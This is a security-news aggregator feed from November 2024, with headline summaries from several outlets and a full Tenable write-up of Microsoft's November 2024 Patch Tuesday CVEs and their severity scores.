There is some disagreement over whether the remote code execution (RCE) security flaws allow for unauthenticated exploitation or not. Citrix says no, but researchers say the company is downplaying a "good old unauthenticated RCE."
by Dark Reading
2024-11-12 16:30:00
5 Ways Behavioral Analytics is Revolutionizing Incident Response
Behavioral analytics, long associated with threat detection (i.e. UEBA or UBA), is experiencing a renaissance. Once primarily used to identify suspicious activity, it’s now being reimagined as a powerful post-detection technology that enhances incident response processes. By leveraging behavioral insights during alert triage and investigation, SOCs can transform their workflows to become more
by The Hacker News
2024-11-12 16:27:52
Expert Insight: The digital pandemic: How cyber threats are threatening life as we know it
2024 is coming to a close, and it’s as good a time as any to reflect on the year we’ve had in cybersecurity. It hasn’t been the easiest ride – just earlier this year, the Department for Science, Innovation and Technology reported that a staggering half of businesses had experienced some form of cybersecurity breach […]
by IT Security Guru
2024-11-12 16:24:12
Discord Leaker Jack Teixeira Awaits Sentence for Sharing U.S. Secrets
The Discord leaks rocked the U.S. national security establishment, revealing the speed with which top-secret materials can spread online.
by ITPro Today
2024-11-12 16:18:28
Understanding Lateral Movement Attacks in Hybrid Environments
Learn how lateral movement attacks pose serious risks in on-prem, cloud, or hybrid environments, and discover effective strategies to mitigate these threats.
by Mitiga
2024-11-12 16:14:00
Charges Unsealed for Alleged Hackers of Snowflake Customers
50 billion call and text records were stolen from one victim, U.S. says.
by ITPro Today
2024-11-12 16:08:39
Log4j Vulnerability Fix: Comprehensive Log4Shell Resources
Learn about the Log4j vulnerability, including resources, updates, and mitigation steps to protect your systems.
by Mitiga
2024-11-12 16:08:39
Guide: CircleCI Breach Cybersecurity Incident Hunting Guide
Learn how to investigate the CircleCI breach with Mitiga’s technical guide to assist organizational threat hunting efforts.
by Mitiga
2024-11-12 16:00:00
Microsoft blocked your Windows 11 upgrade? This trusty tool can (probably) fix that
Microsoft tightened its already strict hardware compatibility requirements for Windows 11 upgrades again. The updated Rufus utility can bypass those restrictions for most PCs, but it's the end of the line for an unlucky few.
by ZDNET Security
2024-11-12 15:58:25
Flexible Structure of Zip Archives Exploited to Hide Malware Undetected
Attackers abuse concatenation, a method that involves appending multiple zip archives into a single file, to deliver a variant of the SmokeLoader Trojan hidden in malicious attachments delivered via phishing.
by ITPro Today
2024-11-12 15:11:50
Emulating the Destructive WhisperGate Malware
AttackIQ has released a new attack graph that seeks to emulate the Tactics, Techniques and Procedures (TTPs) associated with the destructive WhisperGate malware.
by AttackIQ
2024-11-12 15:09:12
Citrix 'Recording Manager' Zero-Day Bug Allows Unauthenticated RCE
The security vulnerability is due to an exposed Microsoft Message Queuing (MSMQ) instance and the use of the insecure BinaryFormatter.
by Dark Reading
2024-11-12 15:00:00
The Power of the Purse: How to Ensure Security by Design
CISA should make its recommended goals mandatory and perform audits to ensure compliance.
by Dark Reading
2024-11-12 15:00:00
Bitdefender vs. Malwarebytes: Which antivirus is best?
Bitdefender offers feature-rich antivirus at a competitive price, while Malwarebytes focuses on protection against malware. Here's how to decide between the two.
by ZDNET Security
2024-11-12 14:50:00
Why Falco works the best in distributed architectures
The cybersecurity landscape is sadly brimming with tools that address narrow, specific problems, leading to a phenomenon known as “Point...
by Sysdig
2024-11-12 14:39:37
Why Changing Pentesting Companies Could Be Your Best Move
Explore strategic decisions on changing pentesting companies. Balance risk, compliance, and security goals with an effective pentesting partner.
by NetSPI
2024-11-12 14:02:10
Microsoft’s November 2024 Patch Tuesday Addresses 87 CVEs (CVE-2024-43451, CVE-2024-49039)
4 Critical, 82 Important, 1 Moderate, 0 Low

Microsoft addresses 87 CVEs and one advisory (ADV240001) in its November 2024 Patch Tuesday release, with four critical vulnerabilities and four zero-day vulnerabilities, including two that were exploited in the wild.

Microsoft patched 87 CVEs in its November 2024 Patch Tuesday release, with four rated critical, 82 rated important and one rated moderate.

This month’s update includes patches for:
.NET and Visual Studio
Airlift.microsoft.com
Azure CycleCloud
Azure Database for PostgreSQL
LightGBM
Microsoft Exchange Server
Microsoft Graphics Component
Microsoft Office Excel
Microsoft Office Word
Microsoft PC Manager
Microsoft Virtual Hard Drive
Microsoft Windows DNS
Role: Windows Hyper-V
SQL Server
TorchGeo
Visual Studio
Visual Studio Code
Windows Active Directory Certificate Services
Windows CSC Service
Windows DWM Core Library
Windows Defender Application Control (WDAC)
Windows Kerberos
Windows Kernel
Windows NT OS Kernel
Windows NTLM
Windows Package Library Manager
Windows Registry
Windows SMB
Windows SMBv3 Client/Server
Windows Secure Kernel Mode
Windows Task Scheduler
Windows Telephony Service
Windows USB Video Driver
Windows Update Stack
Windows VMSwitch
Windows Win32 Kernel Subsystem

Remote code execution (RCE) vulnerabilities accounted for 58.6% of the vulnerabilities patched this month, followed by elevation of privilege (EoP) vulnerabilities at 29.9%.

Important: CVE-2024-43451 | NTLM Hash Disclosure Spoofing Vulnerability

CVE-2024-43451 is an NTLM hash spoofing vulnerability in Microsoft Windows. It was assigned a CVSSv3 score of 6.5 and is rated as important. An attacker could exploit this flaw by convincing a user to open a specially crafted file. Successful exploitation would lead to the unauthorized disclosure of a user’s NTLMv2 hash, which an attacker could then use to authenticate to the system as the user.
According to Microsoft, CVE-2024-43451 was exploited in the wild as a zero-day. No further details about this vulnerability were available at the time this blog post was published. This is the second NTLM spoofing vulnerability disclosed in 2024. Microsoft patched CVE-2024-30081 in its July Patch Tuesday release.

Important: CVE-2024-49039 | Windows Task Scheduler Elevation of Privilege Vulnerability

CVE-2024-49039 is an EoP vulnerability in the Microsoft Windows Task Scheduler. It was assigned a CVSSv3 score of 8.8 and is rated as important. An attacker with local access to a vulnerable system could exploit this vulnerability by running a specially crafted application. Successful exploitation would allow an attacker to access resources that would otherwise be unavailable to them as well as execute code, such as remote procedure call (RPC) functions.

According to Microsoft, CVE-2024-49039 was exploited in the wild as a zero-day. It was disclosed to Microsoft by an anonymous researcher along with Vlad Stolyarov and Bahare Sabouri of Google's Threat Analysis Group. At the time this blog post was published, no further details about in-the-wild exploitation were available.

Important: CVE-2024-49019 | Active Directory Certificate Services Elevation of Privilege Vulnerability

CVE-2024-49019 is an EoP vulnerability affecting Active Directory Certificate Services. It was assigned a CVSSv3 score of 7.8 and is rated as important. It was publicly disclosed prior to a patch being made available. According to Microsoft, successful exploitation would allow an attacker to gain administrator privileges. The advisory notes that “certificates created using a version 1 certificate template with Source of subject name set to ‘Supplied in the request’” are potentially impacted if the template has not been secured according to best practices. This vulnerability is assessed as “Exploitation More Likely” according to Microsoft’s Exploitability Index.
Microsoft’s advisory also includes several mitigation steps for securing certificate templates, which we highly recommend reviewing.

Important: CVE-2024-49040 | Microsoft Exchange Server Spoofing Vulnerability

CVE-2024-49040 is a spoofing vulnerability affecting Microsoft Exchange Server 2016 and 2019. It was assigned a CVSSv3 score of 7.5 and rated as important. According to Microsoft, this vulnerability was publicly disclosed prior to a patch being made available. After applying the update, administrators should review the support article Exchange Server non-RFC compliant P2 FROM header detection. The supplemental guide notes that as part of a “secure by default” approach, the Exchange Server update for November will flag suspicious emails which may contain “malicious patterns in the P2 FROM header.” While this feature can be disabled, Microsoft strongly recommends leaving it enabled to provide further protection from phishing attempts and malicious emails.

Critical: CVE-2024-43639 | Windows Kerberos Remote Code Execution Vulnerability

CVE-2024-43639 is a critical RCE vulnerability affecting Windows Kerberos, an authentication protocol designed to verify user or host identities. It was assigned a CVSSv3 score of 9.8 and is rated as “Exploitation Less Likely.” To exploit this vulnerability, an unauthenticated attacker needs to leverage a cryptographic protocol vulnerability in order to achieve RCE. No further details were provided by Microsoft about this vulnerability at the time this blog was published.

Important: 29 CVEs | SQL Server Native Client Remote Code Execution Vulnerability

This month's release included 29 CVEs for RCEs affecting SQL Server Native Client. All of these CVEs received CVSSv3 scores of 8.8 and were rated as “Exploitation Less Likely.” Successful exploitation of these vulnerabilities can be achieved by convincing an authenticated user into connecting to a malicious SQL server database using an affected driver.
A full list of the CVEs is included in the table below.

CVE | Description | CVSSv3
CVE-2024-38255 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-43459 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-43462 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-48993 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-48994 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-48995 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-48996 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-48997 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-48998 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-48999 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49000 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49001 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49002 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49003 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49004 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49005 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49006 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49007 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49008 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49009 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49010 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49011 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49012 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49013 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49014 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49015 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49016 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49017 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8
CVE-2024-49018 | SQL Server Native Client Remote Code Execution Vulnerability | 8.8

Important: CVE-2024-43602 | Azure CycleCloud Remote Code Execution Vulnerability

CVE-2024-43602 is an RCE vulnerability in Microsoft’s Azure CycleCloud, a tool that helps in managing and orchestrating High Performance Computing (HPC) environments in Azure. This flaw received the highest CVSSv3 score of the month, a 9.9, and was rated as important. A user with basic permissions could exploit CVE-2024-43602 by sending specially crafted requests to a vulnerable Azure CycleCloud cluster to modify its configuration. Successful exploitation would result in the user gaining root permissions, which could then be used to execute commands on any cluster in the Azure CycleCloud as well as steal admin credentials.

Tenable Solutions

A list of all the plugins released for Microsoft’s November 2024 Patch Tuesday update can be found here. As always, we recommend patching systems as soon as possible and regularly scanning your environment to identify those systems yet to be patched.

For more specific guidance on best practices for vulnerability assessments, please refer to our blog post on How to Perform Efficient Vulnerability Assessments with Tenable.

Get more information
Microsoft's November 2024 Security Updates
Tenable plugins for Microsoft November 2024 Patch Tuesday Security Updates
Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
by Tenable
2024-11-12 14:00:00
CyberheistNews Vol 14 #46 [Eye Opener] Attackers Don't Hack, They Log In. Can You Stop Them?
by KnowBe4
2024-11-12 14:00:00
6 Principles of Operational Technology Cybersecurity released by joint NSA initiative
Today’s critical infrastructure organizations rely on operational technology (OT) to help control and manage the systems and processes required to keep critical services to the public running. However, due to the highly integrated nature of OT deployments, cybersecurity has become a primary concern. On October 2, 2024, the NSA (National Security Agency) released a new […]
by Security Intelligence
2024-11-12 13:00:00
Bitwarden vs. 1Password: Which password manager is best?
Bitwarden offers secure, budget-friendly password management, while 1Password puts a premium on user experience. Here's how to decide between the two.
by ZDNET Security
2024-11-12 12:52:30
How to save web pages permanently or find content from deleted sites | Kaspersky official blog
All about tools for archiving websites and searching web page archives.
by Kaspersky
2024-11-12 12:42:25
DNA testing company vanishes along with its customers’ genetic data
Atlas Biomed, a DNA testing company that promised clients insights into their genetic disposition, has suddenly disappeared.
by Malwarebytes Labs
2024-11-12 12:31:43
System prompt exposure: How AI image generators may leak sensitive instructions
Recraft's image generation service could leak its internal system prompts due to its unique architecture combining Claude (an AI language model) with a diffusion model. Unlike other image generators, Recraft could perform calculations and answer questions, which led to the discovery that carefully crafted prompts could expose the system's internal instructions.
by Invicti
2024-11-12 12:24:00
[FREE RESOURCE KIT] Stay Cyber Safe this Holiday Season with Our Free 2024 Resource Kit!
Isn’t it typical for bad actors to strike when we’re distracted and busy during this time of year?
by KnowBe4